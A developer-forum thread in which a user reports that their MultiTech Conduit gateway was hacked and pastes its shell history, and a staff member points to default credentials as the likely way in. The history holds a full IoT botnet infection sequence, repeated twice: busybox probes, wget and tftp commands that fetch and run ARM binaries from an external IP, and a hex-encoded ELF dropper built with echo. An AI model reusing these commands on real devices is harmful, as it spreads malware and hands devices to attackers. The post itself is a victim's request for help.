MultiTech Developer Resources » Topic: gweerwe323f bot hacked

gweerwe323f bot hacked

This topic has 1 reply, 2 voices, and was last updated 6 years, 12 months ago by Mike Fiore.

Viewing 2 posts - 1 through 2 (of 2 total)

Author

Posts
May 15, 2017 at 3:06 pm #19058

Nicolas Carvallo
Participant

Hi there,

I had to reinstall the operating system of the mLinux because ssh was failing. But before this I notice some strange command lines in the history. I was hurried so I did not payed attention. I installed the new version of the mLinux (3.3.6) and then installed mqtt for python.
I connected 8 hours later and I realised the last login was from an external IP: 195.22.127.83 you can google: it is related to some ssh attacks. The strange comand lines were there again.

So my question: Is this related to a security breach on the conduit? How they could enter intothe gateway? How to solve it?

Here the logs in the history. The most impressive is that the gateway was attacked while I was using it, just some minutes before I reset it to factory.

1 ls 2 cd / 3 l 4 ls 5 cd home/ 6 ls 7 cd root/ 8 ls 9 ifconfig 10 ls 11 mosquitto_sub -t lora/+/+ -v 12 nc -u localhost 6677 13 cd mosquitto_Example/ 14 ls 15 ls -l 16 python receive_json.py 17 cd .. 18 ls 19 mkdir download 20 cd download/ 21 wget --no-check-certificate https://pypi.python.org/packages/source/p/paho-mqtt/paho-mqtt-1.1.tar.gz 22 wget --no-check-certificate https://pypi.python.org/packages/source/p/paho-mqtt/paho-mqtt-1.1.tar.gz 23 cd mqtt/ 24 cd paho-mqtt-1.1 25 ls 26 python setup.py install 27 opkg disutils 28 opkg updqte 29 opkg update 30 opkg upgrade 31 opkg update 32 ping 8.8.8 33 ping 8.8.8.8 34 ping http://www.multitech.net/mlinux/feeds/3.1/ 35 ping http://www.multitech.net 36 cd >> 37 cd .. 38 cd .. 39 mkdir google 40 cd google/ 41 wget http://www.google.com 42 ping www.google.com 43 ping http://www.google.com 44 ping google.com 45 ping: unknown host google.com 46 nano /etc/network/interfaces 47 if down 48 reboot 49 /gweerwe323f 50 sudo /bin/sh 51 /bin/busybox cp; /gweerwe323f 52 /bin/busybox mount ;/gweerwe323f 53 /bin/busybox echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox cat //.nippon; /bin/busybox rm -f //.nippon 54 /bin/busybox echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm -f /tmp/.nippon 55 /bin/busybox echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; /bin/busybox cat /var/tmp/.nippon; /bin/busybox rm -f /var/tmp/.nippon 56 /bin/busybox echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox cat //.nippon; /bin/busybox rm -f //.nippon 57 /bin/busybox echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox cat //.nippon; /bin/busybox rm -f //.nippon 58 /bin/busybox echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm -f /dev/.nippon 59 /bin/busybox echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm -f /proc/.nippon 60 /bin/busybox echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm -f /sys/.nippon 61 /bin/busybox echo -e '\x47\x72\x6f\x70/run' > /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm -f /run/.nippon 62 /bin/busybox echo -e '\x47\x72\x6f\x70/var/volatile' > /var/volatile/.nippon; /bin/busybox cat /var/volatile/.nippon; /bin/busybox rm -f /var/volatile/.nippon 63 /bin/busybox echo -e '\x47\x72\x6f\x70/var/config' > /var/config/.nippon; /bin/busybox cat /var/config/.nippon; /bin/busybox rm -f /var/config/.nippon 64 /bin/busybox echo -e '\x47\x72\x6f\x70/var/oem' > /var/oem/.nippon; /bin/busybox cat /var/oem/.nippon; /bin/busybox rm -f /var/oem/.nippon 65 /bin/busybox echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm -f /dev/pts/.nippon 66 /gweerwe323f 67 /bin/busybox cat /bin/echo ;/gweerwe323f 68 /bin/busybox cat /proc/cpuinfo;/gweerwe323f 69 cd /; /bin/busybox wget http://195.22.127.83/bins/usb_bus.arm -O - > usb_bus ; /bin/busybox chmod 777 usb_bus ; ./usb_bus ;/gweerwe323f 70 cd /; /gweerwe323f 71 echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x61\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x1c\x83\x00\x00\x34\x00\x00\x00\xc4\x03\x00\x00\x02\x02\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00' > usb_ver; /gweerwe323f 72 echo -ne '\x00\x80\x00\x00\xa4\x03\x00\x00\xa4\x03\x00\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00\xa4\x03\x00\x00\xa4\x03\x01\x00\xa4\x03\x01\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00\x00\x80\x00\x00\x01\x18\xa0\xe1\xff\x18\x01\xe2\x00\x1c\x81\xe1' >> usb_ver; /gweerwe323f 73 echo -ne '\xff\x30\x03\xe2\x02\x24\xa0\xe1\x03\x10\x81\xe1\xff\x2c\x02\xe2\x01\x20\x82\xe1\xff\x3c\x02\xe2\xff\x08\x02\xe2\x03\x34\xa0\xe1\x20\x04\xa0\xe1\x22\x0c\x80\xe1\x02\x3c\x83\xe1\x00\x00\x83\xe1\x0e\xf0\xa0\xe1\x00\x10\xa0\xe1\x00\x00\x9f\xe5\x97\x00\x00\xea' >> usb_ver; /gweerwe323f 74 echo -ne '\x01\x00\x90\x00\x00\x10\xa0\xe1\x00\x00\x9f\xe5\x93\x00\x00\xea\x06\x00\x90\x00\x01\xc0\xa0\xe1\x00\x10\xa0\xe1\x08\x00\x9f\xe5\x02\x30\xa0\xe1\x0c\x20\xa0\xe1\x8c\x00\x00\xea\x05\x00\x90\x00\x04\xe0\x2d\xe5\x0c\xd0\x4d\xe2\x07\x00\x8d\xe8\x03\x10\xa0\xe3' >> usb_ver; /gweerwe323f 75 echo -ne '\x0d\x20\xa0\xe1\x08\x00\x9f\xe5\x84\x00\x00\xeb\x0c\xd0\x8d\xe2\x00\x80\xbd\xe8\x66\x00\x90\x00\x01\xc0\xa0\xe1\x00\x10\xa0\xe1\x08\x00\x9f\xe5\x02\x30\xa0\xe1\x0c\x20\xa0\xe1\x7b\x00\x00\xea\x04\x00\x90\x00\x01\xc0\xa0\xe1\x00\x10\xa0\xe1\x08\x00\x9f\xe5' >> usb_ver; /gweerwe323f 76 echo -ne '\x02\x30\xa0\xe1\x0c\x20\xa0\xe1\x74\x00\x00\xea\x03\x00\x90\x00\x04\xe0\x2d\xe5\x0c\xd0\x4d\xe2\x07\x00\x8d\xe8\x01\x10\xa0\xe3\x0d\x20\xa0\xe1\x08\x00\x9f\xe5\x6c\x00\x00\xeb\x0c\xd0\x8d\xe2\x00\x80\xbd\xe8\x66\x00\x90\x00\xf0\x41\x2d\xe9\x74\x41\x9f\xe5' >> usb_ver; /gweerwe323f 77 echo -ne '\x94\xd0\x4d\xe2\x00\x00\x00\xea\x01\x40\x84\xe2\x00\x60\xd4\xe5\x00\x00\x56\xe3\xfb\xff\xff\x1a\x58\x31\x9f\xe5\x58\x11\x9f\xe5\x04\x20\xa0\xe3\x01\x00\xa0\xe3\x04\x80\x63\xe0\xd9\xff\xff\xeb\x02\x40\xa0\xe3\x50\xc0\xa0\xe3\x53\x30\xa0\xe3\x16\x10\xa0\xe3' >> usb_ver; /gweerwe323f 78 echo -ne '\x7f\x20\xa0\xe3\xc3\x00\xa0\xe3\x83\xc0\xcd\xe5\x80\x40\xcd\xe5\x81\x60\xcd\xe5\x82\x60\xcd\xe5\xa5\xff\xff\xeb\x1c\x11\x9f\xe5\x84\x00\x8d\xe5\x18\x21\x9f\xe5\x18\x01\x9f\xe5\xb8\xff\xff\xeb\x01\x10\xa0\xe3\x00\x70\xa0\xe1\x06\x20\xa0\xe1\x04\x00\xa0\xe1' >> usb_ver; /gweerwe323f 79 echo -ne '\xd2\xff\xff\xeb\x01\x00\x70\xe3\x01\x00\x77\x13\x00\x50\xa0\xe1\x01\x00\xa0\x03\xa6\xff\xff\x0b\x05\x00\xa0\xe1\x80\x10\x8d\xe2\x10\x20\xa0\xe3\xb1\xff\xff\xeb\x00\x40\x50\xe2\x05\x00\x00\xaa\x01\x00\xa0\xe3\xd0\x10\x9f\xe5\x04\x20\xa0\xe3\xb5\xff\xff\xeb' >> usb_ver; /gweerwe323f 80 echo -ne '\x00\x00\x64\xe2\x9a\xff\xff\xeb\x1f\x40\x88\xe2\x05\x00\xa0\xe1\xb8\x10\x9f\xe5\x04\x20\xa0\xe1\xae\xff\xff\xeb\x04\x00\x50\xe1\x03\x00\xa0\x13\x92\xff\xff\x1b\x06\x40\xa0\xe1\x93\x10\x8d\xe2\x01\x20\xa0\xe3\x05\x00\xa0\xe1\xad\xff\xff\xeb\x01\x00\x50\xe3' >> usb_ver; /gweerwe323f 81 echo -ne '\x04\x00\xa0\xe3\x8a\xff\xff\x1b\x93\x30\xdd\xe5\x04\x44\x83\xe1\x7c\x30\x9f\xe5\x03\x00\x54\xe1\xf3\xff\xff\x1a\x0d\x10\xa0\xe1\x80\x20\xa0\xe3\x05\x00\xa0\xe1\xa1\xff\xff\xeb\x00\x20\x50\xe2\x0d\x40\xa0\xe1\x0d\x10\xa0\xe1\x07\x00\xa0\xe1\x01\x00\x00\xda' >> usb_ver; /gweerwe323f 82 echo -ne '\x94\xff\xff\xeb\xf4\xff\xff\xea\x05\x00\xa0\xe1\x7c\xff\xff\xeb\x07\x00\xa0\xe1\x7a\xff\xff\xeb\x38\x10\x9f\xe5\x04\x20\xa0\xe3\x01\x00\xa0\xe3\x8b\xff\xff\xeb\x05\x00\xa0\xe3\x70\xff\xff\xeb\x94\xd0\x8d\xe2\xf0\x81\xbd\xe8\x5c\x83\x00\x00\x60\x83\x00\x00' >> usb_ver; /gweerwe323f 83 echo -ne '\x41\x02\x00\x00\xff\x01\x00\x00\x68\x83\x00\x00\x70\x83\x00\x00\x78\x83\x00\x00\x0a\x0d\x0a\x0d\x9c\x83\x00\x00\x95\xff\xff\xea\x70\x40\x2d\xe9\x10\x40\x8d\xe2\x70\x00\x94\xe8\x71\x00\x90\xef\x01\x0a\x70\xe3\x00\x40\xa0\xe1\x70\x80\xbd\x98\x03\x00\x00\xeb' >> usb_ver; /gweerwe323f 84 echo -ne '\x00\x30\x64\xe2\x00\x30\x80\xe5\x00\x00\xe0\xe3\x70\x80\xbd\xe8\x00\x00\x9f\xe5\x0e\xf0\xa0\xe1\xa4\x03\x01\x00\x61\x72\x6d\x00\x55\x53\x42\x0a\x00\x00\x00\x00\x75\x73\x62\x5f\x62\x75\x73\x00\x4e\x49\x46\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x62\x69\x6e' >> usb_ver; /gweerwe323f 85 echo -ne '\x73\x2f\x75\x73\x62\x5f\x62\x75\x73\x2e\x61\x72\x6d\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x46\x49\x4e\x0a\x00\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73' >> usb_ver; /gweerwe323f 86 echo -ne '\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x74\x80\x00\x00\x74\x00\x00\x00' >> usb_ver; /gweerwe323f 87 echo -ne '\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\x5c\x83\x00\x00\x5c\x03\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00' >> usb_ver; /gweerwe323f 88 echo -ne '\x08\x00\x00\x00\x03\x00\x00\x00\xa4\x03\x01\x00\xa4\x03\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x03\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00' >> usb_ver; /gweerwe323f 89 echo -ne '\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> usb_ver; /gweerwe323f 90 /bin/busybox chmod +x ./usb_ver;./usb_ver; ./usb_bus ;/gweerwe323f 91 cd /; /bin/busybox tftp -l usb_ver -r dlr.arm -g 195.22.127.83 ; chmod 777 usb_ver ; ./usb_ver ; ./usb_bus tftp; /gweerwe323f 92 ping google.com 93 nano /etc/network/interfaces 94 ifdown eth0 && ifup eth0 95 ping google.com 96 nano /etc/resolv.conf 97 nano /etc/resolv.conf 98 nano /etc/network/interfaces 99 ifdown eth0 && ifup eth0 100 nano /etc/network/interfaces 101 ifdown eth0 && ifup eth0 102 ping google.com 103 opkg update 104 opkg upgrade 105 opkg install disutils 106 opkg install python-distutils 107 cd download/ 108 ls 109 cd mqtt/ 110 ls 111 tar xfz paho-mqtt-1.1.tar.gz 112 cd paho-mqtt-1.1 113 ls 114 python setup.py install 115 opkg install python-email 116 python setup.py install 117 cd /usr/lib/python2.7 118 wget --no-check-certificate http://hg.python.org/cpython/raw-file/4ebe1ede981e/Lib/py_compile.py 119 cd /home/root/download/mqtt/paho-mqtt-1.1 120 ls 121 python setup.py install 122 ls 123 opkg install python-json 124 cd .. 125 cd .. 126 cd .. 127 ls 128 cd mosquitto_Example/ 129 ls 130 python receive_json.py 131 reboot 132 ps ax 133 cd mosquitto_Example/ 134 nano receive_json.py 135 crontab -e 136 nano receive_json.py 137 reboot 138 cd /home/root/ 139 l 140 ls 141 mkdir log 142 ls 143 ps ax 144 ps ax 145 cd log/ 146 ls 147 opkg install ddclient 148 exit 149 nc -u localhost 6677 150 nano /var/config/lora/lora-network-server.conf 151 nc -u localhost 6677 152 /gweerwe323f 153 sudo /bin/sh 154 /bin/busybox cp; /gweerwe323f 155 /bin/busybox mount ;/gweerwe323f 156 /bin/busybox echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox cat //.nippon; /bin/busybox rm -f //.nippon 157 /bin/busybox echo -e '\x47\x72\x6f\x70/tmp' > /tmp/.nippon; /bin/busybox cat /tmp/.nippon; /bin/busybox rm -f /tmp/.nippon 158 /bin/busybox echo -e '\x47\x72\x6f\x70/var/tmp' > /var/tmp/.nippon; /bin/busybox cat /var/tmp/.nippon; /bin/busybox rm -f /var/tmp/.nippon 159 /bin/busybox echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox cat //.nippon; /bin/busybox rm -f //.nippon 160 /bin/busybox echo -e '\x47\x72\x6f\x70/' > //.nippon; /bin/busybox cat //.nippon; /bin/busybox rm -f //.nippon 161 /bin/busybox echo -e '\x47\x72\x6f\x70/dev' > /dev/.nippon; /bin/busybox cat /dev/.nippon; /bin/busybox rm -f /dev/.nippon 162 /bin/busybox echo -e '\x47\x72\x6f\x70/proc' > /proc/.nippon; /bin/busybox cat /proc/.nippon; /bin/busybox rm -f /proc/.nippon 163 /bin/busybox echo -e '\x47\x72\x6f\x70/sys' > /sys/.nippon; /bin/busybox cat /sys/.nippon; /bin/busybox rm -f /sys/.nippon 164 /bin/busybox echo -e '\x47\x72\x6f\x70/run' > /run/.nippon; /bin/busybox cat /run/.nippon; /bin/busybox rm -f /run/.nippon 165 /bin/busybox echo -e '\x47\x72\x6f\x70/var/volatile' > /var/volatile/.nippon; /bin/busybox cat /var/volatile/.nippon; /bin/busybox rm -f /var/volatile/.nippon 166 /bin/busybox echo -e '\x47\x72\x6f\x70/var/config' > /var/config/.nippon; /bin/busybox cat /var/config/.nippon; /bin/busybox rm -f /var/config/.nippon 167 /bin/busybox echo -e '\x47\x72\x6f\x70/var/oem' > /var/oem/.nippon; /bin/busybox cat /var/oem/.nippon; /bin/busybox rm -f /var/oem/.nippon 168 /bin/busybox echo -e '\x47\x72\x6f\x70/dev/pts' > /dev/pts/.nippon; /bin/busybox cat /dev/pts/.nippon; /bin/busybox rm -f /dev/pts/.nippon 169 /gweerwe323f 170 /bin/busybox cat /bin/echo ;/gweerwe323f 171 /bin/busybox cat /proc/cpuinfo;/gweerwe323f 172 cd /; /bin/busybox wget http://195.22.127.83/bins/usb_bus.arm -O - > usb_bus ; /bin/busybox chmod 777 usb_bus ; ./usb_bus ;/gweerwe323f 173 cd /; /gweerwe323f 174 echo -ne '\x7f\x45\x4c\x46\x01\x01\x01\x61\x00\x00\x00\x00\x00\x00\x00\x00\x02\x00\x28\x00\x01\x00\x00\x00\x1c\x83\x00\x00\x34\x00\x00\x00\xc4\x03\x00\x00\x02\x02\x00\x00\x34\x00\x20\x00\x02\x00\x28\x00\x05\x00\x04\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x80\x00\x00' > usb_ver; /gweerwe323f 175 echo -ne '\x00\x80\x00\x00\xa4\x03\x00\x00\xa4\x03\x00\x00\x05\x00\x00\x00\x00\x80\x00\x00\x01\x00\x00\x00\xa4\x03\x00\x00\xa4\x03\x01\x00\xa4\x03\x01\x00\x00\x00\x00\x00\x08\x00\x00\x00\x06\x00\x00\x00\x00\x80\x00\x00\x01\x18\xa0\xe1\xff\x18\x01\xe2\x00\x1c\x81\xe1' >> usb_ver; /gweerwe323f 176 echo -ne '\xff\x30\x03\xe2\x02\x24\xa0\xe1\x03\x10\x81\xe1\xff\x2c\x02\xe2\x01\x20\x82\xe1\xff\x3c\x02\xe2\xff\x08\x02\xe2\x03\x34\xa0\xe1\x20\x04\xa0\xe1\x22\x0c\x80\xe1\x02\x3c\x83\xe1\x00\x00\x83\xe1\x0e\xf0\xa0\xe1\x00\x10\xa0\xe1\x00\x00\x9f\xe5\x97\x00\x00\xea' >> usb_ver; /gweerwe323f 177 echo -ne '\x01\x00\x90\x00\x00\x10\xa0\xe1\x00\x00\x9f\xe5\x93\x00\x00\xea\x06\x00\x90\x00\x01\xc0\xa0\xe1\x00\x10\xa0\xe1\x08\x00\x9f\xe5\x02\x30\xa0\xe1\x0c\x20\xa0\xe1\x8c\x00\x00\xea\x05\x00\x90\x00\x04\xe0\x2d\xe5\x0c\xd0\x4d\xe2\x07\x00\x8d\xe8\x03\x10\xa0\xe3' >> usb_ver; /gweerwe323f 178 echo -ne '\x0d\x20\xa0\xe1\x08\x00\x9f\xe5\x84\x00\x00\xeb\x0c\xd0\x8d\xe2\x00\x80\xbd\xe8\x66\x00\x90\x00\x01\xc0\xa0\xe1\x00\x10\xa0\xe1\x08\x00\x9f\xe5\x02\x30\xa0\xe1\x0c\x20\xa0\xe1\x7b\x00\x00\xea\x04\x00\x90\x00\x01\xc0\xa0\xe1\x00\x10\xa0\xe1\x08\x00\x9f\xe5' >> usb_ver; /gweerwe323f 179 echo -ne '\x02\x30\xa0\xe1\x0c\x20\xa0\xe1\x74\x00\x00\xea\x03\x00\x90\x00\x04\xe0\x2d\xe5\x0c\xd0\x4d\xe2\x07\x00\x8d\xe8\x01\x10\xa0\xe3\x0d\x20\xa0\xe1\x08\x00\x9f\xe5\x6c\x00\x00\xeb\x0c\xd0\x8d\xe2\x00\x80\xbd\xe8\x66\x00\x90\x00\xf0\x41\x2d\xe9\x74\x41\x9f\xe5' >> usb_ver; /gweerwe323f 180 echo -ne '\x94\xd0\x4d\xe2\x00\x00\x00\xea\x01\x40\x84\xe2\x00\x60\xd4\xe5\x00\x00\x56\xe3\xfb\xff\xff\x1a\x58\x31\x9f\xe5\x58\x11\x9f\xe5\x04\x20\xa0\xe3\x01\x00\xa0\xe3\x04\x80\x63\xe0\xd9\xff\xff\xeb\x02\x40\xa0\xe3\x50\xc0\xa0\xe3\x53\x30\xa0\xe3\x16\x10\xa0\xe3' >> usb_ver; /gweerwe323f 181 echo -ne '\x7f\x20\xa0\xe3\xc3\x00\xa0\xe3\x83\xc0\xcd\xe5\x80\x40\xcd\xe5\x81\x60\xcd\xe5\x82\x60\xcd\xe5\xa5\xff\xff\xeb\x1c\x11\x9f\xe5\x84\x00\x8d\xe5\x18\x21\x9f\xe5\x18\x01\x9f\xe5\xb8\xff\xff\xeb\x01\x10\xa0\xe3\x00\x70\xa0\xe1\x06\x20\xa0\xe1\x04\x00\xa0\xe1' >> usb_ver; /gweerwe323f 182 echo -ne '\xd2\xff\xff\xeb\x01\x00\x70\xe3\x01\x00\x77\x13\x00\x50\xa0\xe1\x01\x00\xa0\x03\xa6\xff\xff\x0b\x05\x00\xa0\xe1\x80\x10\x8d\xe2\x10\x20\xa0\xe3\xb1\xff\xff\xeb\x00\x40\x50\xe2\x05\x00\x00\xaa\x01\x00\xa0\xe3\xd0\x10\x9f\xe5\x04\x20\xa0\xe3\xb5\xff\xff\xeb' >> usb_ver; /gweerwe323f 183 echo -ne '\x00\x00\x64\xe2\x9a\xff\xff\xeb\x1f\x40\x88\xe2\x05\x00\xa0\xe1\xb8\x10\x9f\xe5\x04\x20\xa0\xe1\xae\xff\xff\xeb\x04\x00\x50\xe1\x03\x00\xa0\x13\x92\xff\xff\x1b\x06\x40\xa0\xe1\x93\x10\x8d\xe2\x01\x20\xa0\xe3\x05\x00\xa0\xe1\xad\xff\xff\xeb\x01\x00\x50\xe3' >> usb_ver; /gweerwe323f 184 echo -ne '\x04\x00\xa0\xe3\x8a\xff\xff\x1b\x93\x30\xdd\xe5\x04\x44\x83\xe1\x7c\x30\x9f\xe5\x03\x00\x54\xe1\xf3\xff\xff\x1a\x0d\x10\xa0\xe1\x80\x20\xa0\xe3\x05\x00\xa0\xe1\xa1\xff\xff\xeb\x00\x20\x50\xe2\x0d\x40\xa0\xe1\x0d\x10\xa0\xe1\x07\x00\xa0\xe1\x01\x00\x00\xda' >> usb_ver; /gweerwe323f 185 echo -ne '\x94\xff\xff\xeb\xf4\xff\xff\xea\x05\x00\xa0\xe1\x7c\xff\xff\xeb\x07\x00\xa0\xe1\x7a\xff\xff\xeb\x38\x10\x9f\xe5\x04\x20\xa0\xe3\x01\x00\xa0\xe3\x8b\xff\xff\xeb\x05\x00\xa0\xe3\x70\xff\xff\xeb\x94\xd0\x8d\xe2\xf0\x81\xbd\xe8\x5c\x83\x00\x00\x60\x83\x00\x00' >> usb_ver; /gweerwe323f 186 echo -ne '\x41\x02\x00\x00\xff\x01\x00\x00\x68\x83\x00\x00\x70\x83\x00\x00\x78\x83\x00\x00\x0a\x0d\x0a\x0d\x9c\x83\x00\x00\x95\xff\xff\xea\x70\x40\x2d\xe9\x10\x40\x8d\xe2\x70\x00\x94\xe8\x71\x00\x90\xef\x01\x0a\x70\xe3\x00\x40\xa0\xe1\x70\x80\xbd\x98\x03\x00\x00\xeb' >> usb_ver; /gweerwe323f 187 echo -ne '\x00\x30\x64\xe2\x00\x30\x80\xe5\x00\x00\xe0\xe3\x70\x80\xbd\xe8\x00\x00\x9f\xe5\x0e\xf0\xa0\xe1\xa4\x03\x01\x00\x61\x72\x6d\x00\x55\x53\x42\x0a\x00\x00\x00\x00\x75\x73\x62\x5f\x62\x75\x73\x00\x4e\x49\x46\x0a\x00\x00\x00\x00\x47\x45\x54\x20\x2f\x62\x69\x6e' >> usb_ver; /gweerwe323f 188 echo -ne '\x73\x2f\x75\x73\x62\x5f\x62\x75\x73\x2e\x61\x72\x6d\x20\x48\x54\x54\x50\x2f\x31\x2e\x30\x0d\x0a\x0d\x0a\x00\x00\x46\x49\x4e\x0a\x00\x00\x00\x00\x00\x2e\x73\x68\x73\x74\x72\x74\x61\x62\x00\x2e\x74\x65\x78\x74\x00\x2e\x72\x6f\x64\x61\x74\x61\x00\x2e\x62\x73' >> usb_ver; /gweerwe323f 189 echo -ne '\x73\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x0b\x00\x00\x00\x01\x00\x00\x00\x06\x00\x00\x00\x74\x80\x00\x00\x74\x00\x00\x00' >> usb_ver; /gweerwe323f 190 echo -ne '\xe8\x02\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x11\x00\x00\x00\x01\x00\x00\x00\x32\x00\x00\x00\x5c\x83\x00\x00\x5c\x03\x00\x00\x48\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x01\x00\x00\x00\x19\x00\x00\x00' >> usb_ver; /gweerwe323f 191 echo -ne '\x08\x00\x00\x00\x03\x00\x00\x00\xa4\x03\x01\x00\xa4\x03\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x04\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x03\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xa4\x03\x00\x00\x1e\x00\x00\x00\x00\x00\x00\x00' >> usb_ver; /gweerwe323f 192 echo -ne '\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00' >> usb_ver; /gweerwe323f 193 /bin/busybox chmod +x ./usb_ver;./usb_ver; ./usb_bus ;/gweerwe323f 194 cd /; /bin/busybox tftp -l usb_ver -r dlr.arm -g 195.22.127.83 ; chmod 777 usb_ver ; ./usb_ver ; ./usb_bus tftp; /gweerwe323f 195 /gweerwe323f195.22.127.83 196 ifconfig 197 history > history_for_print.txt

May 15, 2017 at 3:15 pm #19059

Mike Fiore
Blocked

Nicolas,

Were your Conduit’s username/password still at the default values? The defaults are easy to guess. We suggest changing them in order to prevent situations like this.

Cheers,
Mike
Author

Posts

Viewing 2 posts - 1 through 2 (of 2 total)

You must be logged in to reply to this topic.

gweerwe323f bot hacked

User

Sitemap

Pages

Forums